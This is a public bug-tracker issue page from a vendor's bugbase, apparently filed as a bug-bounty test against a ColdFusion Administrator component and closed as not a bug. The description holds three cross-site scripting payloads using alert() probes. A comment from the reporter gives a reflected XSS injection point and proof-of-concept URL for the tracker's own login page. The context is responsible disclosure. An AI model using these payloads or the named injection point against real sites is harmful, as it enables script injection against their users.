tracker issue : CF-3949685

select a category, or use search below
(searches all categories and all time range)
Title:

bug bounty test

| View in Tracker

Status/Resolution/Reason: Closed/Withdrawn/NotABug

Reporter/Name(from Bugbase): steve borosh / steve borosh (steve borosh)

Created: 03/07/2015

Components: Administrator

Versions: 10.0

Failure Type: Enhancement Request

Found In Build/Fixed In Build: Final /

Priority/Frequency: Trivial / Unknown

Locale/System: English / Linux OpenSuSe 11

Vote Count: 0

veris-->group<svg/onload=alert(/XSS/)//
#"><img src=M onerror=alert('XSS');>
[<blockquote cite="]">[" onmouseover="alert('XSS');" ]

----------------------------- Additional Watson Details -----------------------------

Watson Bug ID:	3949685

External Customer Info:
External Company:  
External Customer Name: steve
External Customer Email:  
External Test Config: My Hardware and Environment details:

Attachments:

Comments:

Steve, Can you please explain the issue or share the steps to reproduce this issue?
Comment by Nimit S.
8142 | April 14, 2015 09:47:40 AM GMT
Hello, I believe this is in reference to a bug I submitted through hackerone.com #50497 Adobe "bugbase" Cross-Site Scripting Injection Point: https://bugbase.adobe.com/index.cfm?event=login&origEvent=<injection> Proof-of-Concept: https://bugbase.adobe.com/index.cfm?event=login&origEvent=";alert('RVRSH3LL_XSS')//
Comment by External U.
8143 | April 14, 2015 10:44:30 AM GMT